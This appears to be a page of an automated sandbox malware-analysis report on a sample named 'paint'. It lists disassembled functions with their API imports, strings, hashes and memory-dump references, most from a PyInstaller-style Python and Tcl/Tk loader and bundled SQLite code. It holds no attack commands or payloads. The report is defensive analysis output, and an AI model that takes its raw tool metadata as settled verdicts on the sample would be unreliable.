PyStatus_Exception, xrefs: 00007FF6F0BD5E29, 00007FF6F0BD5E4B
Failed to get address for %hs, xrefs: 00007FF6F0BD5851
PyErr_Clear, xrefs: 00007FF6F0BD5A91, 00007FF6F0BD5AB3
PyImport_ImportModule, xrefs: 00007FF6F0BD5C2F, 00007FF6F0BD5C51
PyErr_Occurred, xrefs: 00007FF6F0BD5B1B, 00007FF6F0BD5B3D
PyObject_Str, xrefs: 00007FF6F0BD5D9F, 00007FF6F0BD5DC1
PyImport_ExecCodeModule, xrefs: 00007FF6F0BD5C01, 00007FF6F0BD5C23
Py_InitializeFromConfig, xrefs: 00007FF6F0BD58F3, 00007FF6F0BD5915
PyUnicode_FromString, xrefs: 00007FF6F0BD5F6B, 00007FF6F0BD5F8D
PyObject_CallFunctionObjArgs, xrefs: 00007FF6F0BD5D15, 00007FF6F0BD5D37
PyErr_Fetch, xrefs: 00007FF6F0BD5ABF, 00007FF6F0BD5AE1
PyConfig_SetBytesString, xrefs: 00007FF6F0BD5A07, 00007FF6F0BD5A29
PyConfig_Read, xrefs: 00007FF6F0BD59D9, 00007FF6F0BD59FB
PyUnicode_AsUTF8, xrefs: 00007FF6F0BD5EB3, 00007FF6F0BD5ED5
Py_Finalize, xrefs: 00007FF6F0BD58C5, 00007FF6F0BD58E7
PyErr_NormalizeException, xrefs: 00007FF6F0BD5AED, 00007FF6F0BD5B0F
PyObject_GetAttrString, xrefs: 00007FF6F0BD5D43, 00007FF6F0BD5D65
PyUnicode_DecodeFSDefault, xrefs: 00007FF6F0BD5F0F, 00007FF6F0BD5F31

Memory Dump Source

Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: AddressErrorLastProc
String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
API String ID: 199729137-653951865
Opcode ID: 3ca4f2c8e8fa74ff45c561f9825c8e8d27386d4e804e1314c270c66bff6859f6
Instruction ID: d27a3dc65abff6921c8fa578cb9386e4c3360e7c04281b7a001f2128a5e72cb7
Opcode Fuzzy Hash: 3ca4f2c8e8fa74ff45c561f9825c8e8d27386d4e804e1314c270c66bff6859f6
Instruction Fuzzy Hash: 3422652890EB07F1FB559BA5B91897562A9AF06756FC45035C83F833E0FF7EB5889200

Function 00007FF6F0BD76B0 Relevance: 177.1, APIs: 66, Strings: 35, Instructions: 314libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FF6F0BD76C7
GetLastError.KERNEL32 ref: 00007FF6F0BD76D9
GetProcAddress.KERNEL32 ref: 00007FF6F0BD7715
GetLastError.KERNEL32 ref: 00007FF6F0BD7727
GetProcAddress.KERNEL32 ref: 00007FF6F0BD7740
GetLastError.KERNEL32 ref: 00007FF6F0BD7752
GetProcAddress.KERNEL32 ref: 00007FF6F0BD776B
GetLastError.KERNEL32 ref: 00007FF6F0BD777D
GetProcAddress.KERNEL32 ref: 00007FF6F0BD7799
GetLastError.KERNEL32 ref: 00007FF6F0BD77AB
GetProcAddress.KERNEL32 ref: 00007FF6F0BD77C7
GetLastError.KERNEL32 ref: 00007FF6F0BD77D9
GetProcAddress.KERNEL32 ref: 00007FF6F0BD77F5
GetLastError.KERNEL32 ref: 00007FF6F0BD7807
GetProcAddress.KERNEL32 ref: 00007FF6F0BD7823
GetLastError.KERNEL32 ref: 00007FF6F0BD7835
GetProcAddress.KERNEL32 ref: 00007FF6F0BD7851
GetLastError.KERNEL32 ref: 00007FF6F0BD7863

Strings

Tcl_SetVar2, xrefs: 00007FF6F0BD7A41, 00007FF6F0BD7A63
Tcl_DeleteInterp, xrefs: 00007FF6F0BD77EB, 00007FF6F0BD780D
Tcl_FindExecutable, xrefs: 00007FF6F0BD7736, 00007FF6F0BD7758
GetProcAddress, xrefs: 00007FF6F0BD76EF
Tcl_CreateInterp, xrefs: 00007FF6F0BD770B, 00007FF6F0BD772D
Tcl_ConditionFinalize, xrefs: 00007FF6F0BD792D, 00007FF6F0BD794F
Tcl_MutexUnlock, xrefs: 00007FF6F0BD78D1, 00007FF6F0BD78F3
Tcl_ConditionWait, xrefs: 00007FF6F0BD7989, 00007FF6F0BD79AB
Tcl_DoOneEvent, xrefs: 00007FF6F0BD7761, 00007FF6F0BD7783
Tcl_Free, xrefs: 00007FF6F0BD7C3B, 00007FF6F0BD7C5D
Tcl_FinalizeThread, xrefs: 00007FF6F0BD77BD, 00007FF6F0BD77DF
Tcl_Init, xrefs: 00007FF6F0BD76C0, 00007FF6F0BD76DF
Tcl_MutexFinalize, xrefs: 00007FF6F0BD78FF, 00007FF6F0BD7921
Tcl_Alloc, xrefs: 00007FF6F0BD7C0D, 00007FF6F0BD7C2F
Tcl_GetString, xrefs: 00007FF6F0BD7A9D, 00007FF6F0BD7ABF
Tcl_CreateObjCommand, xrefs: 00007FF6F0BD7A6F, 00007FF6F0BD7A91
Tcl_JoinThread, xrefs: 00007FF6F0BD7875, 00007FF6F0BD7897
Tcl_NewByteArrayObj, xrefs: 00007FF6F0BD7AF9, 00007FF6F0BD7B1B
Tcl_GetCurrentThread, xrefs: 00007FF6F0BD7847, 00007FF6F0BD7869
Tcl_EvalObjv, xrefs: 00007FF6F0BD7BDF, 00007FF6F0BD7C01
Tcl_EvalEx, xrefs: 00007FF6F0BD7BB1, 00007FF6F0BD7BD3
Tcl_SetVar2Ex, xrefs: 00007FF6F0BD7B27, 00007FF6F0BD7B49
Failed to get address for %hs, xrefs: 00007FF6F0BD76E8
Tcl_GetObjResult, xrefs: 00007FF6F0BD7B55, 00007FF6F0BD7B77
Tcl_CreateThread, xrefs: 00007FF6F0BD7819, 00007FF6F0BD783B
Tcl_Finalize, xrefs: 00007FF6F0BD778F, 00007FF6F0BD77B1
Tcl_MutexLock, xrefs: 00007FF6F0BD78A3, 00007FF6F0BD78C5
Tcl_ConditionNotify, xrefs: 00007FF6F0BD795B, 00007FF6F0BD797D
Tcl_GetVar2, xrefs: 00007FF6F0BD7A13, 00007FF6F0BD7A35
Tk_GetNumMainWindows, xrefs: 00007FF6F0BD7C97, 00007FF6F0BD7CB9
Tcl_ThreadAlert, xrefs: 00007FF6F0BD79E5, 00007FF6F0BD7A07
Tcl_ThreadQueueEvent, xrefs: 00007FF6F0BD79B7, 00007FF6F0BD79D9
Tk_Init, xrefs: 00007FF6F0BD7C69, 00007FF6F0BD7C8B
Tcl_EvalFile, xrefs: 00007FF6F0BD7B83, 00007FF6F0BD7BA5
Tcl_NewStringObj, xrefs: 00007FF6F0BD7ACB, 00007FF6F0BD7AED

Memory Dump Source

Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: AddressErrorLastProc
String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
API String ID: 199729137-3427451314
Opcode ID: 0a662de07e299f73dada83b080b335429a490c7fb48c0bc5bb894b33d2b2cc2e
Instruction ID: 4fd2aeea368b7a09fe89871dc722961a3d320f6b18d8b93d5c687a3f982faa66
Opcode Fuzzy Hash: 0a662de07e299f73dada83b080b335429a490c7fb48c0bc5bb894b33d2b2cc2e
Instruction Fuzzy Hash: 1C02B728A4EB07F0EB149BA5A8149B5636AAF06756FC44035D83FC33E0FF3EB5499250

Function 00007FF6F0BD81C0 Relevance: 24.6, APIs: 6, Strings: 8, Instructions: 117COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6F0BD9400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6F0BD45E4,00000000,00007FF6F0BD1985), ref: 00007FF6F0BD9439

ExpandEnvironmentStringsW.KERNEL32(?,00007FF6F0BD88A7,?,?,00000000,00007FF6F0BD3CBB), ref: 00007FF6F0BD821C

Part of subcall function 00007FF6F0BD2810: MessageBoxW.USER32 ref: 00007FF6F0BD28EA

Strings

LOADER: failed to convert runtime-tmpdir to a wide string., xrefs: 00007FF6F0BD81F3
%.*s, xrefs: 00007FF6F0BD82FC
LOADER: failed to obtain the absolute path of the runtime-tmpdir., xrefs: 00007FF6F0BD82C9
LOADER: failed to expand environment variables in the runtime-tmpdir., xrefs: 00007FF6F0BD8230
\, xrefs: 00007FF6F0BD8251
LOADER: failed to create runtime-tmpdir path %ls!, xrefs: 00007FF6F0BD8363
LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!, xrefs: 00007FF6F0BD828D
CreateDirectory, xrefs: 00007FF6F0BD836C

Memory Dump Source

Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
API String ID: 1662231829-930877121
Opcode ID: 6e1db7188d29f55993033d39f9d092d149d7f4b46b4bc38197dd47a6e93f4cef
Instruction ID: 2122c61fddc9ac755c32be2b55d3e5714d38cb3082ddcf2f8103a818439cdb96
Opcode Fuzzy Hash: 6e1db7188d29f55993033d39f9d092d149d7f4b46b4bc38197dd47a6e93f4cef
Instruction Fuzzy Hash: 4351D821A1E683B1FB509B60E8516BAA366EF96781FC44031E92FC37D5FE3EE5058740

Function 00007FF6F0BD1600 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 145COMMON

Download Yara Rule

Strings

Failed to extract %s: failed to open target file!, xrefs: 00007FF6F0BD165C
Failed to extract %s: failed to allocate temporary buffer!, xrefs: 00007FF6F0BD1742
Failed to extract %s: failed to open archive file!, xrefs: 00007FF6F0BD16A2
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF6F0BD16DA
fopen, xrefs: 00007FF6F0BD1663
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF6F0BD17DF
Failed to extract %s: failed to write data chunk!, xrefs: 00007FF6F0BD17CA
fwrite, xrefs: 00007FF6F0BD17D1
Failed to create symbolic link %s!, xrefs: 00007FF6F0BD1622
fseek, xrefs: 00007FF6F0BD16E1
fread, xrefs: 00007FF6F0BD17E6
malloc, xrefs: 00007FF6F0BD1749

Memory Dump Source

Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
API String ID: 2050909247-1550345328
Opcode ID: f04c79676af06d65577a15ebcc6baf409848a7d07ebbe59f051d325da0faf50a
Instruction ID: b509cb3fbae2eb6ed8520ac792fd666c2ea22f8505926139e2675406166c16cf
Opcode Fuzzy Hash: f04c79676af06d65577a15ebcc6baf409848a7d07ebbe59f051d325da0faf50a
Instruction Fuzzy Hash: 6E51C165F0A643B2EB10AB6194005B9A366BF82B94FC44531EE2E877D6FF3EE5458340

Function 00007FFDFB0DD690 Relevance: 17.9, APIs: 1, Strings: 9, Instructions: 386COMMON

Download Yara Rule

Strings

unable to open shared library [%.*s], xrefs: 00007FFDFB0DDC9F
lib, xrefs: 00007FFDFB0DD8E1
not authorized, xrefs: 00007FFDFB0DD703
%s.%s, xrefs: 00007FFDFB0DD75C
sqlite3_extension_init, xrefs: 00007FFDFB0DD71A
_init, xrefs: 00007FFDFB0DD98E
error during initialization: %s, xrefs: 00007FFDFB0DDA56
no entry point [%s] in shared library [%s], xrefs: 00007FFDFB0DDB2C
sqlite3_, xrefs: 00007FFDFB0DD893

Memory Dump Source

Source File: 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB060000, based on PE: true

Associated: 00000001.00000002.2015020570.00007FFDFB060000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1C1000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1C3000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1D8000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015663978.00007FFDFB1DA000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015698265.00007FFDFB1DC000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb060000_paint.jbxd

Similarity

API ID:
String ID: %s.%s$_init$error during initialization: %s$lib$no entry point [%s] in shared library [%s]$not authorized$sqlite3_$sqlite3_extension_init$unable to open shared library [%.*s]
API String ID: 0-3733955532
Opcode ID: 671a89d222fdc13ea8000fc10d6abe48d02ce2d833756ace11273f028f8a07dc
Instruction ID: 4dbc3758a3ca3a2c4bc661adab614fef262558e75f66ea1ac5a05c1410cbd1aa
Opcode Fuzzy Hash: 671a89d222fdc13ea8000fc10d6abe48d02ce2d833756ace11273f028f8a07dc
Instruction Fuzzy Hash: EC028362B0AA8385EB158F15A464BB96361FF4AB85F444235EA6E067F9DF3CE504D300

Function 00007FFDFB09B150 Relevance: 17.8, APIs: 2, Strings: 8, Instructions: 330COMMON

Download Yara Rule

APIs

00007FFE1A463010.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FFDFB09B253
00007FFE1A463010.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FFDFB09B334

Strings

%lld, xrefs: 00007FFDFB09B3F1
-- , xrefs: 00007FFDFB09B1E3, 00007FFDFB09B202
%02x, xrefs: 00007FFDFB09B554
zeroblob(%d), xrefs: 00007FFDFB09B4F0
NULL, xrefs: 00007FFDFB09B3BD
%!.15g, xrefs: 00007FFDFB09B40E
?, xrefs: 00007FFDFB09B348
'%.*q', xrefs: 00007FFDFB09B4A5

Memory Dump Source

Source File: 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB060000, based on PE: true

Associated: 00000001.00000002.2015020570.00007FFDFB060000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1C1000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1C3000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1D8000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015663978.00007FFDFB1DA000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015698265.00007FFDFB1DC000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb060000_paint.jbxd

Similarity

API ID: 00007A463010
String ID: %!.15g$%02x$%lld$'%.*q'$-- $?$NULL$zeroblob(%d)
API String ID: 4225454184-875588658
Opcode ID: 18b3c992eb28e1a0aff938a211f6eba9336fe8c1eb93773f796c937e9d9e6dad
Instruction ID: 9cd6f0cabc40237780bbba73cc6cf23b4a977a37f7ba428500c2129dc33b1125
Opcode Fuzzy Hash: 18b3c992eb28e1a0aff938a211f6eba9336fe8c1eb93773f796c937e9d9e6dad
Instruction Fuzzy Hash: DDE19226F0A65B89FB20CF64D460BBC27A1AB4679CF404136DA2E56BEDDE3CE445D340

Function 00007FFDFB0B77F0 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 327COMMON

Download Yara Rule

APIs

00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB0B7B62

Strings

Cannot add a column with non-constant default, xrefs: 00007FFDFB0B79F9
cannot add a STORED column, xrefs: 00007FFDFB0B7B02
Cannot add a REFERENCES column with non-NULL default value, xrefs: 00007FFDFB0B797D
Cannot add a PRIMARY KEY column, xrefs: 00007FFDFB0B7911
SELECT raise(ABORT,%Q) FROM "%w"."%w", xrefs: 00007FFDFB0B7987, 00007FFDFB0B7A03, 00007FFDFB0B7B11
UPDATE "%w".sqlite_master SET sql = printf('%%.%ds, ',sql) || %Q || substr(sql,1+length(printf('%%.%ds',sql))) WHERE type = 'table' AND name = %Q, xrefs: 00007FFDFB0B7BA4
Cannot add a NOT NULL column with default value NULL, xrefs: 00007FFDFB0B799F
SELECT CASE WHEN quick_check GLOB 'CHECK*' THEN raise(ABORT,'CHECK constraint failed') WHEN quick_check GLOB 'non-* value in*' THEN raise(ABORT,'type mismatch on DEFAULT') ELSE raise(ABORT,'NOT NULL constraint failed') END FROM pragma_quick_check(%Q,%Q) WHERE, xrefs: 00007FFDFB0B7CEC
Cannot add a UNIQUE column, xrefs: 00007FFDFB0B792C

Memory Dump Source

Source File: 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB060000, based on PE: true

Associated: 00000001.00000002.2015020570.00007FFDFB060000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1C1000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1C3000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1D8000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015663978.00007FFDFB1DA000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015698265.00007FFDFB1DC000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb060000_paint.jbxd

Similarity

API ID: 00007A463010
String ID: Cannot add a NOT NULL column with default value NULL$Cannot add a PRIMARY KEY column$Cannot add a REFERENCES column with non-NULL default value$Cannot add a UNIQUE column$Cannot add a column with non-constant default$SELECT CASE WHEN quick_check GLOB 'CHECK*' THEN raise(ABORT,'CHECK constraint failed') WHEN quick_check GLOB 'non-* value in*' THEN raise(ABORT,'type mismatch on DEFAULT') ELSE raise(ABORT,'NOT NULL constraint failed') END FROM pragma_quick_check(%Q,%Q) WHERE$SELECT raise(ABORT,%Q) FROM "%w"."%w"$UPDATE "%w".sqlite_master SET sql = printf('%%.%ds, ',sql) || %Q || substr(sql,1+length(printf('%%.%ds',sql))) WHERE type = 'table' AND name = %Q$cannot add a STORED column
API String ID: 4225454184-200680935
Opcode ID: fd0e222e7faf09e0b063a0f2a82046eceadd766e45b64b1c38adeb6e4bde358b
Instruction ID: 3899861e10940651e09c87a7a19df570d5cdecbf2b4ce3d23e6f2779e7e192a1
Opcode Fuzzy Hash: fd0e222e7faf09e0b063a0f2a82046eceadd766e45b64b1c38adeb6e4bde358b
Instruction Fuzzy Hash: 3CE19122B0AA8385EB658B159564BB927A1FB42BC8F048035CE6D477FDDF3CE545DB00

Function 00007FF6F0BD2180 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 00007FF6F0BD21AB
SelectObject.GDI32 ref: 00007FF6F0BD21F2
DrawTextW.USER32 ref: 00007FF6F0BD2215
SelectObject.GDI32 ref: 00007FF6F0BD222B
ReleaseDC.USER32 ref: 00007FF6F0BD223B
MoveWindow.USER32 ref: 00007FF6F0BD228B
MoveWindow.USER32 ref: 00007FF6F0BD22CB
MoveWindow.USER32 ref: 00007FF6F0BD231E
MoveWindow.USER32 ref: 00007FF6F0BD2366

Strings

P%, xrefs: 00007FF6F0BD21FF

Memory Dump Source

Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: MoveWindow$ObjectSelect$DrawReleaseText
String ID: P%
API String ID: 2147705588-2959514604
Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
Instruction ID: 6e1f8c7775155a737b8344f35aab00d046834222019df077205ccdbfd13550fd
Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
Instruction Fuzzy Hash: A6510626604BA186D7249F22E4185BAB7A1FB98B61F004125EBDF83795EF3DD045DB10

Function 00007FF6F0BD80B0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

GetWindowLongPtrW.USER32 ref: 00007FF6F0BD80EF
GetWindowLongPtrW.USER32 ref: 00007FF6F0BD816F
ShutdownBlockReasonCreate.USER32 ref: 00007FF6F0BD8182
GetLastError.KERNEL32 ref: 00007FF6F0BD818C
SetWindowLongPtrW.USER32 ref: 00007FF6F0BD81A3

Strings

Needs to remove its temporary files., xrefs: 00007FF6F0BD8175

Memory Dump Source

Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: LongWindow$BlockCreateErrorLastReasonShutdown
String ID: Needs to remove its temporary files.
API String ID: 3975851968-2863640275
Opcode ID: 1b4b32be61da5f45784fe9fe2f7d724fb74bbaf2a32eb33803c40e4204126e7e
Instruction ID: a5614849f8203546173ac6eec0ca5a0c0e075c1f7f9dab151b241fa8f974548d
Opcode Fuzzy Hash: 1b4b32be61da5f45784fe9fe2f7d724fb74bbaf2a32eb33803c40e4204126e7e
Instruction Fuzzy Hash: 4921E525B09A42D2E7454BBAA854579A255FF8AB92F884130DF3FC33D4FE2DD5858300

Function 00007FFDFAA02720 Relevance: 15.2, APIs: 10, Instructions: 227COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FFDFAA02748
__scrt_acquire_startup_lock.LIBCMT ref: 00007FFDFAA0279A
_RTC_Initialize.LIBCMT ref: 00007FFDFAA027C8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 00007FFDFAA027EE
__scrt_release_startup_lock.LIBCMT ref: 00007FFDFAA02819

Memory Dump Source

Source File: 00000001.00000002.2013426793.00007FFDFAA01000.00000040.00000001.01000000.00000014.sdmp, Offset: 00007FFDFAA00000, based on PE: true

Associated: 00000001.00000002.2013391762.00007FFDFAA00000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2013426793.00007FFDFAA62000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2013426793.00007FFDFAAAE000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2013426793.00007FFDFAAB2000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2013426793.00007FFDFAAB7000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2013426793.00007FFDFAB0F000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2013426793.00007FFDFAB14000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2013426793.00007FFDFAB17000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2013772305.00007FFDFAB18000.00000080.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2013801898.00007FFDFAB19000.00000004.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfaa00000_paint.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: bc53fe8a0eda1481b36a314380ac74b5aff62c5ee69524d86cd6bd6c99e3d1c0
Instruction ID: f528d7b5d5b0b9b77ab331c8d1e6668383bf52ed2284824a3077940b40a6682d
